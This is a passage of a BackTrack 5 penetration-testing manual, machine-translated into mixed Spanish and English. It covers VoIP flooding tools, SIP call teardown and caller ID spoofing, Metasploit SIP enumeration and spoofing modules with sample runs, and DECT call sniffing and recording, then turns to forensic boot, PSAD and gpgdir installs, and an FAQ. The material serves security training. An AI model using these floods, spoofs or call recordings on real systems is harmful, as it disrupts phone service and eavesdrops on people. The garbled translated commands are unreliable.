Mientras la herramienta mantiene inundando el gateway SIP, al evitar que los usuarios realicen llamadas telefónicas. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy.

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.

root@bt:/pentest/voip/rtpflood# ./rtpfloodusage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

Iaxflood

IAXFlood es una herramienta para inundar el protocolo IAX2 que es utilizado por el asterisco PBX.

root@bt:/pentest/voip/iaxflood# ./iaxfloodusage: ./iaxflood sourcename destinationname numpackets

Teardown

Teardown se utiliza para terminar una llamada mediante el envío de una petición BYE

./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id

Page 82: Manual Backtrack

value.

SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.105; sucursal = z9hG4bKkfnyfaol, recibido = 192.168.1.105; rport = 5060 De: "200" ;tag=hcykd Para: "200" ;tag=as644fe807Call-ID: jwtgckolqnoylqf@backtrack CSeq: 134 REGISTRO User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE Compatible con: sustituye Expira: 3600 Contacto: ;expires=3600Date: Tue, 01 Feb 2011 17:55:42 GMT Content-Length: 0

Si se especifica la opción "-v" opción se puede ver la carga útil:

SIP carga útil para paquetes:BYE sip:[email protected]:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.105:9; sucursal = 91ca1ba5-98ee-44d5-9170-61c30981c565 De: <sip:192.168.1.104>; tag = hcykdTo: 200 <sip:[email protected]>;tag=as644fe807Call-ID: jwtgckolqnoylqf@backtrack CSeq: 2000000000 BYEMax-Forwards: 16 User-Agent: Hacker Content-Length: 0Contact: <sip:192.168.1.105:9>

Spoofing Caller ID Existen varios métodos para la identificación de llamadas spoofing que no vamos a discutir aquí, ya que requiere un conjunto diferente de herramientas y equipos que no son relevantes para este propósito artículo. Caller ID Spoofing en SIP es bastante fácil, sólo tiene que cambiar la petición SIP "INVITE" de cabecera.

INVITE sip:@127.0.0.1 SIP/2.0 A: <sip:192.168.1.104> Via: 192.168.1.104 SIP/2.0/UDP De: "Hacker Evil" Call-ID: 14810.0.1.45 CSeq: 1 INVITEMax-Forwards: 20 Contact: <sip:127.0.0.1>

Vamos a echar un vistazo a una herramienta que ya hemos discutido llamado Inviteflood que se puede

Page 83: Manual Backtrack

utilizar para enviar falsa invitar peticiones.

root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack"

Attacking VoIP Using Metasploit The Metasploit framework includes several auxiliaries and modules dedicated for VoIP exploitation. Usted puede encontrarlos mediante la función de búsqueda con palabras clave como "sip" o "VoIP". Let's Launch “msfconsole” and perform a search for available modules:

root @ bt: ~ # msfconsole

msf > search sip

Metasploit VoIP Modules

Here's a complete list of the available modules for you reference:

Auxiliaries

scanner/sip/enumerator - SIP Username Enumerator (UDP) scanner/sip/enumerator_tcp - SIP Username Enumerator (TCP) scanner/sip/options - SIP Endpoint Scanner (UDP) scanner/sip/options_tcp - SIP Endpoint Scanner (TCP) voip/sip_invite_spoof - SIP Invite Spoof

Exploits

windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow windows/sip/sipxezphone_cseq - SIPfoundry sipXezPhone 0.35a CSeq Field Overflow windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion

Scanning SIP Enabled Devices

Metasploit provides a sip scanner auxiliary which comes in two flavors TCP and UDP, we can use it to discover SIP enabled devices using the OPTION method: Let's see an example of the UDP version: scanner/sip/options auxiliary Auxiliary Options and Usage:

msf > use auxiliary/scanner/sip/optionsmsf auxiliary(options) > show options

Opciones del módulo auxiliar (/ escáner / sip / opciones): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no La dirección local del cliente CPORT 5060 no The local client port Rhosts sí la meta rango de direcciones CIDR o identificador Rport 5060 yes El puerto de destino

Page 84: Manual Backtrack

Temas del 1 Sí El número de subprocesos simultáneos A nadie no el nombre de usuario de destino para sondear en cada host

msf auxiliary(options) > set RHOSTS 192.168.1.130/24 Rhosts => 192.168.1.130/24msf auxiliary(options) > run

[*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

Enumerating SIP extensions / Usernames

The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts, it supports two methods of discovery: OPTIONS and REGISTER, it also comes in two flavors TCP and UDP. Auxiliary options:

msf > use scanner/sip/enumeratormsf auxiliary(enumerator) > show options

Opciones del módulo auxiliar (/ escáner / sip / enumerador):

Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no La dirección local del cliente CPORT 5060 no The local client port MAXEXT 9999 sí Ending extensión MÉTODO DE REGISTRO sí Método de recuento de usar OPCIONES / REGISTER MINEXT 0 yes Starting extension PADLEN 4 sí relleno Cero máxima longitud Rhosts sí la meta rango de direcciones CIDR o identificador Rport 5060 yes El puerto de destino Temas del 1 Sí El número de subprocesos simultáneos

Ejemplo de uso:

msf auxiliary(enumerator) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(enumerator) > set MINEXT 100 MINEXT => 100 msf auxiliary(enumerator) > set MAXEXT 500 MAXEXT => 500 msf auxiliary(enumerator) > set PADLEN 3 PADLEN => 3 msf auxiliary(enumerator) > run [*] Found user: 200 <sip:[email protected]> [Auth] [*] Found user: 201 <sip:[email protected]> [Auth] [*] Found user: 202 <sip:[email protected]> [Auth] [*] Found user: 203 <sip:[email protected]> [Auth] [*] Found user: 204 <sip:[email protected]>

Page 85: Manual Backtrack

[Auth] [*] Found user: 300 <sip:[email protected]> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Spoofing Caller ID auxiliary

The voip/sip_invite_spoof auxiliary will create a fake SIP invite request making the targeted device ring and display fake caller id information. Auxiliary Options:

msf > use voip/sip_invite_spoofmsf auxiliary(sip_invite_spoof) > show options

Opciones del módulo auxiliar (/ voip / sip_invite_spoof):

Name Current Setting Required Description ---- --------------- -------- ----------- El MSG Metasploit usted tiene sí el identificador de llamadas falso para enviar Rhosts sí la meta rango de direcciones CIDR o identificador Rport 5060 yes El puerto de destino SRCADDR 192.168.1.1 si la dirección SIP a la llamada falsa proviene de Temas del 1 Sí El número de subprocesos simultáneos

Ejemplo de uso:

msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104 Rhosts => 192.168.1.104msf auxiliary(sip_invite_spoof) > run

[*] Sending Fake SIP Invite to: 192.168.1.104[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

Exploiting VoIP systems

Metasploit incluye varios exploits para el software cliente SIP e incluso para la interfaz de administración web Trixbox PBX.

Although this is not a SIP specific vulnerability it is still related and can enable a full control by an attacker on a PBX.

Closing Words I hope you've found this document informative, please keep in mind that Backtrack Linux provides many tools and features we haven't covered here. Take the time to browse the tools read the manuals and README's I am sure you'll find the right tool for the job.

Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love to here your feedback ideas and experiences.

Page 86: Manual Backtrack

http://www.backtrack-linux.org/forums/

Sobre el autor Shai rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk Management in Israel; He holds the Offensive security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il

Referencias http://en.wikipedia.org/wiki/Session_Initiation_Protocol http://tools.ietf.org/html/rfc3261 http://www.hackingvoip.com/

DECT Sniffing Dedected

Este artículo fue contribuido por 5M7X.

• URL: http://www.back-track.de/index.php?page=team # SMTX • Twitter: ! http://twitter.com/ # / 5M7X • Email: [email protected]

BIG FAT HAIRY ADVERTENCIA: ES ILEGAL grabar conversaciones telefónicas en muchos países. Para obtener una lista de las leyes de privacidad estatales en los EE.UU.,

Page 87: Manual Backtrack

Contenido [hide]

• 1 ¿Qué es DECT?

• 1.1 El problema?

• 1.2 Probado en

• 2 Instalación dedected

• 2.1 Instalación del repositorio

• 2.2 Instalación desde el código fuente

• 3 Instale algunas herramientas adicionales

• 4 Cargue los controladores

• 5 Escanear

Page 88: Manual Backtrack

¿Qué es DECT? http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

El problema?

La mayoría de los vendedores no implementar el cifrado en sus dispositivos, de forma que uno puede olerlo con determinado hardware y software. En un post anterior sobre el tema, consulte: http://www.offensive-security.com/backtrack/sniffing-dect-phones-the-details/

Probado en

• BackTrack 5 KDE último kernel 2.6.38 con x86 • Original Dosch y Amand Tipo II PCMCIA Card • SIEMENS C1 Teléfonos DECT configurado en modo repetidor

NOTA: Este es un programa experimental que no está muy apoyado activamente más!

Instalación dedected Con el fin de obtener dedected instalado en BackTrack, usted tiene las siguientes opciones:

1. Utilice dedected de los BackTrack 5 repositorios. 2. Compilar por su cuenta si usted quiere experimentar.

Instalar desde repositorio root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install dedected

Instalación desde el código fuente

Esta etapa es opcional para aquellos que quieran construir las herramientas de código fuente.

root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux / root @ bt: ~ # cd / pentest / telefonía root @ bt: ~ # svn co https://dedected.org/svn/trunk dedected_svn root @ bt: ~ # cd dedected_svn / com-on-air_cs-linux / root @ bt: ~ # make && make-C herramientas

Instale algunas herramientas adicionales root @ bt: ~ # apt-get-y install audacia

Page 89: Manual Backtrack

Cargue los controladores root @ bt: ~ # cd / pentest / telefonía / dedected / com-on-air_cs-linux root @ bt: ~ # make nodo

Si no ha introducido su Dosch y tipo Amand 2 o Tipo 3 o Voo: doo # PCMCIA tarjeta hágalo ahora! A continuación, cargar el controlador:

root @ bt: ~ # make load

Analizar en busca de partes fijas aka fp (estaciones base DECT) root @ bt: ~ # cd / pentest / telefonía / dedected / com-on-air_cs-linux / tools root @ bt:. ~ # / dect_cli

Si necesita información sobre el tipo de uso "ayuda". Si usted vive en la cerradura de EE.UU. a los EE.UU. / DECT 6 banda a través de la "banda" de comandos. Vamos a permitir someverbosity:

verbo

Y empezará a buscar las estaciones base:

fpscan

Después de escanear 2-3 veces a través de todos los canales de desactivar la verbosidad, y detener la exploración:

verbo detener

No haga caso de los teléfonos que no quieren oler (por ejemplo, sus vecinos!) Iniciar un callscan

callscan

Ahora toma el teléfono DECT y hacer una llamada de prueba y espere hasta que aparezca la llamada telefónica. Asimismo, es suficiente si usted acaba de obtener un tono de marcación. Debería ver algo como

Llamada # # # encontrado nuevo 00 82 31 33 73 en el canal 7 RSSI 34

detener

El nombre de su estación base si desea:

Nombre 00 82 31 33 73 stallowned

Volcar todos los teléfonos se encuentran:

arrojar

Page 90: Manual Backtrack

No haga caso de todos los teléfonos excepto el suyo a través del siguiente comando! IMPORTANTE!

ignorar 01 30 95 13 37

Grabe la llamada telefónica Comience automaticially registro de cada llamada telefónica que detecta:

AUTOREC

Ahora toma el teléfono telefonía DECT y hacer una Llamada prueba. Recomiendo llamar un "serivce tiempo diciendo" que se puede llegar a través de un número de teléfono normal. Usted debe obtener algo como esto:

# # # A partir AUTOREC # # # Parando DIP # # # A partir callscan # # # Intentando sincronizar en ab b0 00 82 29 # # # Tiene sincronización # # # Dumping dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap # # # Parando DIP

Después de colgar tu llamada telefónica al vertimiento debería detenerse:

Page 91: Manual Backtrack

Decodificar la llamada de la corriente de datos Detenga el AUTOREC:

detener

Decodificar el audiostream de la basura cruda

root @ bt:. ~ # / decode.sh

Page 92: Manual Backtrack

Importe los arroyos en audacia y escuchar las llamadas Comience audacia a través de "alt + f2" y escriba "audacia" y pulse Enter. Importe las partes fijas y portátiles hte-parte de archivos wav / pentest / telefonía / dedected / com-on-air_cs-linux / tools través de Archivo -.> Importar -> Audio o simplemente "ctrl + shift + I". Importar los archivos que terminan en. Pcap_fp.ima.g721.wav y pcap_pp.ima.g721.wav..

Juega tu llamada telefónica con el botón de reproducción:

Page 93: Manual Backtrack

Sugerencia: si sólo se puede oír el ruido del teléfono parece utilizar algunos de codificación / cifrado. Puede activar el modo de repetidor en su teléfono por lo que deshabilita el cifrado y se puede probar si su configuración está funcionando correctamente.

Limpiar / Recargar Si tiene que volver a cargar los controladores

Page 94: Manual Backtrack

root @ bt: ~ # cd / pentest / telefonía / dedected / com-on-air_cs-linux root @ bt: ~ # make recargar

Si ha terminado y desea limpiar:

root @ bt: ~ # cd / pentest / telefonía / dedected / com-on-air_cs-linux root @ bt: ~ # make unload root @ bt: ~ # rm / dev / coa

Protocolo DECT Si usted está interesado en más detalles del protocolo, puede abrir el archivo pcap en Wireshark.:

Page 95: Manual Backtrack
Page 96: Manual Backtrack

Video: Sniffing teléfonos DECT con BackTrack 5

Oler los teléfonos DECT con BackTrack desde SMTX .

Forensics

Actualmente no hay texto en esta página. Puedes buscar este título de página en otras páginas, o buscar en los registros relacionados .

Forensics Boot

Forensics Boot • Desde BackTrack 4 y ahora BackTrack 5 te habrás dado cuenta de que tiene un Forensics

BackTrack BackTrack opción pero ¿qué es eso?

• LiveCD y Forense

Page 97: Manual Backtrack

Durante mucho tiempo, ahora, Linux Live CD han sido muy útiles para fines de adquisición forense en los casos en que, por una razón u otra no se puede utilizar un bloqueador de escritura de hardware. Cuando se configura no a las unidades de montaje automático, y conocer un poco de la forma, un Linux Live CD puede ser un bloqueador de software de escritura maravilloso. Para un CD de Linux en vivo para ser considerado para este propósito, sin embargo, es de la mayor importancia que el uso de la CD en vivo no altera en cualquier datos de cualquier manera. Esa es la razón principal por la que BackTrack se puso en marcha en el pasado, BackTrack se montan automáticamente los discos disponibles y utilizar las particiones de intercambio cuando estén disponibles, al hacer esto BackTrack pudo causar todo tipo de estragos, el cambio de los últimos tiempos de montaje, la alteración de datos en el disco, y así sucesivamente . Pero como BackTrack 4 y ahora BackTrack 5 que no es el caso más.

• ¿Cómo?

Por lo tanto, vamos a tener la primicia. Personas forenses son a menudo detallista y muy conservador, así que ¿cómo sabemos que es seguro de usar? Bueno, para empezar el BackTrack 5 CD en vivo se basa fuera de Casper, y no contiene secuencias de comandos del sistema de archivos de montaje automático en absoluto. Los scripts de inicialización del sistema se han modificado en el modo de arranque forense para que BackTrack 5 no buscar o hacer uso de cualquier partición de swap que figuran en el sistema. Todos estos scripts se han eliminado del sistema.

• Verificación:

Para probar esta funcionalidad, hemos probado esta modalidad de arranque con configuraciones de hardware. Para cada prueba, se tomó una instantánea antes MD5 de los discos del sistema, arranca en modo de arranque BackTrack5 forense, verificado ningún sistema de archivos fueron montadas y swap no estaba en uso, hizo una serie de actividades en el sistema, a continuación, apague el sistema hacia abajo y tomó una instantánea después de MD5. En la comparación de las dos instantáneas MD5, en cada caso eran un partido, lo que demuestra ningún cambio en los discos se ha hecho.

• Uso:

Cuando se utilizan con fines forenses Backtrack, asegúrese de que no se esperará a que un arranque sin supervisión. Arranque por defecto para Backtrack es el modo de arranque estándar, que utilizará las particiones swap si están presentes. Hay un retraso agradable sin embargo, por lo que tendrá un montón de tiempo para seleccionar el modo de arranque correcto. También, por favor recuerde que esta es una distribución de Linux. Es altamente recomendable que se familiarice con Linux antes de usar este o cualquier otro Live CD de Linux para propósitos forenses. Además, asegúrese de revisar las herramientas forenses adicionales añadidos a Backtrack 5. Nos hemos concentrado en la adición de imágenes y herramientas de triage, pero si usted encuentra que uno de sus utilidades favoritas no está en su sitio, por favor háganoslo saber para que podamos mirar en tener agregó.

Instalar PSAD

• URL: http://www.nanotechfibers.com/ • Twitter: ! http://twitter.com/ # / rickflores_

Page 98: Manual Backtrack

• Email: [email protected]

PSAD: Detección de intrusiones y análisis de registros con iptables ¿Qué está drogas psicoactivas?

PSAD es una colección de tres demonios del sistema livianos (dos demonios principales y un demonio ayudante) que se ejecutan en máquinas Linux y analizar los mensajes de registro # iptables para detectar escaneos de puertos y el tráfico sospechosa. Una implementación típica consiste en ejecutar las drogas psicoactivas en el firewall iptables donde # # tiene el acceso más rápido a los datos de registro.

Proceso de instalación:

• Verificar md5sum, y la clave pública:

root @ bt: ~ # cd / usr / local / src root @ bt: / usr / local / src # wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2 root @ bt: / usr / local / src # wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.md5 root @ bt: / usr / local / src # wget http://cipherdyne.org / psad/download/psad-2.1.7.tar.bz2.asc root @ bt: / usr / local / src # wget http://cipherdyne.org/public_key root @ bt: / usr / local / src # md5sum - c PSAD-2.1.7.tar.bz2.md5 PSAD-2.1.7.tar.bz2: root @ bt Aceptar: / usr / local / src # gpg - import public_key root @ bt: / usr / local / src # gpg - verify PSAD-2.1.7.tar.bz2.asc # gpg: Firma hizo Mié 14 de julio 2010 06:01:06 PM EDT uso de claves DSA ID 0D3E7410 # gpg: Good signature de "Michael Rash (La firma de clave para cipherdyne . Proyectos ORG) <[email protected]> "

• Instale PSAD:

root @ bt: / usr / local / src # tar xfj PSAD-2.1.7.tar.bz2 root @ bt: / usr / local / src # cd PSAD-2.1.7 root @ bt:. / usr/local/src/psad-2.1.7 # / install.pl

# ¿Te gustaría instalar las últimas firmas de # http://www.cipherdyne.org/psad/signatures (y / n)? y

• Comience PSAD:

Tenga en cuenta que recibirá el siguiente error:

root @ bt :/ usr/local/src/psad-2.1.7 # / etc / init.d / PSAD inicio PSAD inicio: [*] No se pudo encontrar electrónico, editar el archivo / etc / PSAD / psad.conf en / usr / sbin / línea PSAD 9679.

Page 99: Manual Backtrack

Para solucionar este problema tendremos que editar psad.conf ubicado en / etc / PSAD / y agregar una dirección de correo electrónico de la siguiente manera:

root @ bt :/ usr/local/src/psad-2.1.7 # vim / etc / PSAD / psad.conf

También puedes ver: Más Referencias

• Autor Bio: Mis pasiones son la nanoingeniería, Ruby programación, explotación de software, explotar desarrollo, hacking hardware embebido. También me gusta levantar pesas, natación de combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y acondicionamiento físico.

Instalar GPGDir

• URL: http://www.nanotechfibers.com/ • Twitter: ! http://twitter.com/ # / rickflores_ • Email: [email protected]

gpgdir - Encriptación directorio recursivo con GnuPG ¿Cuál es gpgdir?

gpgdir es un script de perl que utiliza el GnuPG CPAN :: Módulo de interfaz para cifrar y descifrar los directorios mediante una clave gpg especificado en ~ /. gpgdirrc.

Proceso de instalación:

• Verifique que la llave pública:

root @ bt: ~ # cd / usr / local / src / root @ bt: / usr / local / src # mkdir gpgdir root @ bt: / usr / local / src # cd gpgdir / root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2 root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/public_key root @ bt: / usr / local / src / gpgdir # gpg - import public_key root @ bt: / usr / local / src / gpgdir # gpg - verify-gpgdir 1.9.5.tar.bz2.asc

Page 100: Manual Backtrack

• Instale gpgdir:

root @ bt: / usr / local / src / # tar gpgdir xfj gpgdir-1.9.5.tar.bz2 root @ bt: / usr / local / src / gpgdir # cd gpgdir-1.9.5 root @ bt:. / usr/local/src/gpgdir/gpgdir-1.9.5 # / install.pl

• Editar el archivo de configuración para utilizar la clave GnuPG por defecto:

root @ bt: vim / usr / local / src / gpgdir

También puedes ver: Más Referencias

• Autor Bio: Mis pasiones son la nanoingeniería, Ruby programación, explotación de software, explotar desarrollo, hacking hardware embebido. También me gusta levantar pesas, natación de combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y acondicionamiento físico.

UGS CONOCIDOS

Bugs conocidos en BackTrack

BackTrack 5 R1

• Instalación parece colgar en un 99%. Esto es un error cosmético introducido por nosotros. Dale tiempo, sigue siendo copiado!.

• conductores rt2800usb son poco fiables. Algunas tarjetas de entrar en modo monitor, pero no muestran y capturan los datos. Si este es su caso, intente compilar los controladores personalizados de una rama compat-wireless. Para mosre

Preguntas más frecuentes

Page 101: Manual Backtrack
Page 102: Manual Backtrack

Contenido [hide]

• 1 BackTrack Preguntas frecuentes

• 2 Acabo de instalar BackTrack, ¿cuál es la contraseña de root?

• 3 ¿Por qué mi parada teclado funciona cuando intento escribir la contraseña?

• 4 ¿Cómo iniciar el entorno gráfico?

• BackTrack 5 ¿Es libre para descargar?

• 6 ¿Se ofrecen versiones de 64 bits o un gnomo de BackTrack?

• 7 ¿Qué versión debo descargar?

• 8 Yo acabo de quemar mi iso y no arranca?

• 9 Yo uso Windows y

Page 103: Manual Backtrack

BackTrack Preguntas frecuentes

Acabo de instalar BackTrack, ¿cuál es la contraseña de root? El instalador Ubiquity utiliza el nombre de usuario "root" y "Toor" password por defecto.

También recomendamos que cambie esto tan pronto como haya reiniciado y comprobado que todo funciona correctamente. Puede hacerlo emitiendo el siguiente comando y siguiendo las instrucciones.

passwd root

¿Por qué mi parada teclado funciona cuando intento escribir la contraseña? No, el teclado sigue funcionando.

Cuando escribe su contraseña en BackTrack, no se muestra nada en la pantalla. Esta es una medida de seguridad para evitar que alguien "hombro" y ser capaz de ver el tiempo que su contraseña es, lo que hace que sea más difícil para alguien que usted sabe que adivinar la contraseña.

¿Cómo puedo iniciar el entorno gráfico? Después de arrancar desde el DVD / USB o después de entrar en una instalación de disco duro, escriba el siguiente comando

startx

Es gratis para descargar BackTrack? Sí, y siempre lo será.

¿Ofrecen una versión de 64 bits o gnomo de BackTrack? Sí, ahora ofrecen 64 bits y 32 bits ISO, así como el apoyo a los dispositivos basados en ARM móviles. Tanto la versión de 32 bits y 64 bits vienen con Gnome o KDE. También puede utilizar Fluxbox como su WM.

¿Qué versión debo descargar? Le recomendamos que descargue BackTrack 5. Ya no apoyar ninguna otra versión.

Page 104: Manual Backtrack

Acabo de quemar mis iso y no arranca? Los tres problemas más comunes son la suma md5 es incorrecto, el programa que utilizó para grabar el archivo. Iso o materiales baratos. Por favor revise estas tres cosas antes de pedir ayuda.

Yo uso Windows y no quiero meter la pata? Backtrack se puede ejecutar como un entorno vivo dvd que no afectará a su instalación de Windows en modo alguno. Si ejecuta el instalador y se instala en el disco duro que son los responsables de particionar su disco correctamente y seleccionar la unidad correcta o partición. Guías sobre los métodos de instalación se puede encontrar en la página de instalación .

Por favor, recuerde que las selecciones incorrectas completamente puede limpiar su disco duro y, potencialmente, se va sin su Windows / instalaciones originales de Linux!

Considere esto como su única advertencia!

He oído que es estúpido que se ejecute como root? Muchas de las herramientas de Backtrack necesite acceso de root para ejecutar. Backtrack es una distribución de pruebas de penetración especializada. Confiamos en que nuestros usuarios conozcan los riesgos de seguridad se ejecuta como el usuario root.

¿Cuál es el "perfecto" laptop para correr marcha atrás en? Cada versión de un perfecto es diferente. No hay equipo perfecto. Por favor, compruebe los foros donde los usuarios publican sus reflexiones sobre los modelos de computadoras.

Por favor, recuerde que debe añadir la suya a la lista demasiado

¿Dónde está el manual de Backtrack? No hay un manual. Tenemos escribir documentación oficial sobre cómo instalar Backtrack y cómo utilizar algunas de las herramientas más exóticos, sin embargo, no escribir guías sobre piratería informática en general. Tenemos un foro de la comunidad y una wiki que ambos contienen muchos usuarios y tutoriales Dev Team presentados. Por favor recuerde revisar el manual de la sección de la página web para obtener más información sobre la documentación oficial.

¿Ofrecen algún tipo de formación oficial? Consulte nuestra ofensiva de Entrenamiento en Seguridad Web site para la Formación BackTrack sólo oficial.

Page 105: Manual Backtrack

¿Dónde puedo encontrar más información sobre BackTrack? Manténgase al día con nuestro blog , revise nuestros foros y comprobar BackTrack Fixes aquí.

¿Por qué no puedo yo añadir los repositorios de Backtrack para mi instalación de Ubuntu o los repositorios de Ubuntu a mi instalación Backtrack? Le recomendamos encarecidamente en contra de esta acción porque las herramientas de Backtrack se construyen con muchas características personalizadas, bibliotecas y núcleo. No tenemos forma de saber cómo se llevará a cabo de manera no distribución Backtrack, además de que muy pronto romper su instalación.

Además, si desea añadir los repositorios de Ubuntu a tu Backtrack instalación, con toda seguridad, romper su instalación Backtrack todo muy rápidamente.

Hacemos un montón de pruebas para asegurar que todos los paquetes en nuestro repo trabajarán juntos sin causar problemas.

Si te decides por este curso de acción que usted lo hace bajo su propio riesgo y el equipo de marcha atrás no ofrecerá ningún apoyo de ninguna manera.

Quiero / necesidad de reconstruir el kernel, ¿me puedes ayudar? En primer lugar, es muy poco probable que realmente tienen la necesidad de hacer esto. En segundo lugar, si usted necesita ayuda para reconstruir el kernel, entonces probablemente no deberías estar haciéndolo en primer lugar.

Hacemos un montón de pruebas para asegurar que todos los paquetes en nuestro trabajo repo con el núcleo que la oferta y utilizando su propio núcleo no tenemos manera de saber lo que la compatibilidad se romperá. Nosotros no apoyamos esto y no ofrecen ayuda para aquellos que optan por seguir adelante y reconstruir el kernel.

Lo siento, pero si usted todavía siente que quiere / necesita para reconstruir el kernel por cualquier razón, usted está por su cuenta. Nosotros no apoyamos esto y no ofrecen ninguna pregunta o respuesta de ayuda de aquellos que deciden seguir adelante y reconstruir el kernel.

¿Por qué mis tarjetas de red aparecen cuando arranco? BackTrack es una distribución de pruebas de penetración y como tales peticiones DHCP, etc entra en la red durante el arranque suelen ser muy indeseable. Usted puede habilitar la red ejecutando el siguiente comando:

/ Etc / init.d / networking inicio

Page 106: Manual Backtrack

¿Por qué no puedo utilizar BackTrack tarjeta inalámbrica "X" dentro de VMWare o Virtualbox? Cualquier software de virtualización sólo puede utilizar las tarjetas de red inalámbrica USB como dispositivos físicos, todos los otros tipos de tarjetas inalámbricas son vistos como dispositivos virtuales Ethernet y sólo puede ser visto como un dispositivo inalámbrico por el anfitrión y no por el sistema operativo invitado. Así que si usted desea ejecutar BackTrack en VMWare o Virtualbox y tienen todas las capacidades inalámbricas, asegúrese de que está utilizando un dispositivo USB.

¿Por qué no ofrecer una imagen USB como lo hizo con las versiones anteriores? Las versiones anteriores requieren a veces bastante complicado métodos para instalar en una memoria USB, por lo que por conveniencia hemos proporcionado imágenes especiales para facilitar la instalación. Con las últimas ediciones de BackTrack hemos eliminado esa necesidad, ya que fácilmente se puede instalar en una memoria USB con herramientas como Unetbootin o mediante métodos manuales que se describen en la instalación de este sitio.

¿Cómo puedo contactar con usted? A decir verdad, en la mayoría de los casos que realmente no necesitan.

En primer lugar considerar esto, cada uno de nosotros recibimos cientos de correos electrónicos y mensajes privados tanto en los foros y en nuestro canal de IRC cada día. Casi todos estos mensajes son de personas que hacen preguntas simples que están bien cubiertos en este wiki, FAQ o en el foro mismo. Casi todos y cada uno de ellos es una cuestión que debe plantearse en el foro , ya que o bien se cubran, o la pregunta y su respuesta posterior sería de beneficio para toda la comunidad y no sólo la persona que solicite la misma. Piénsalo de esta manera, si usted está haciendo esta pregunta, no tendría sentido que alguien más puede tener la misma pregunta o Ya ha formulado. El foro y wiki son valiosas fuentes de información y que la información es sólo tan buena como las preguntas formuladas y las respuestas.

En segundo lugar, todo el equipo son voluntarios, ninguno de nosotros se les paga para trabajar en el proyecto y todos tenemos vidas, familia, trabajo, etc, fuera de BackTrack. Todos damos nuestro tiempo libre al proyecto y más de lo que se recoge responder a estas preguntas es menos tiempo tenemos que trabajar en hacer BackTrack incluso mejor de lo que es.

Así que en resumen, si su pregunta no cae en la descripción anterior, entonces es en su interés no enviar por correo electrónico o enviar un mensaje privado. Es muy probable que simplemente se ignora si se incluirá en esta categoría.

Sin embargo, si hay algo no contemplado en el anterior, entonces por todos los medios se comunica con nosotros.

Usted puede encontrar todos los el equipo de desarrollo en nuestro canal de IRC (recordar que no vivimos allí todo el tiempo), en los foros o los datos de contacto en el Acerca página del sitio web .

Page 107: Manual Backtrack

¿Dónde está el canal de IRC que está hablando? Si usted desea unirse a la comunidad y contribuir, visítenos en irc.freenode.net, en el canal # backtrack-linux. Nuestra página web seguirá siendo la fuente principal de todas las noticias y novedades sobre BackTrack. Asegúrese de ver a nuestras reglas del canal leer el tópico del canal y recuerden que deben ser registrados para hablar.

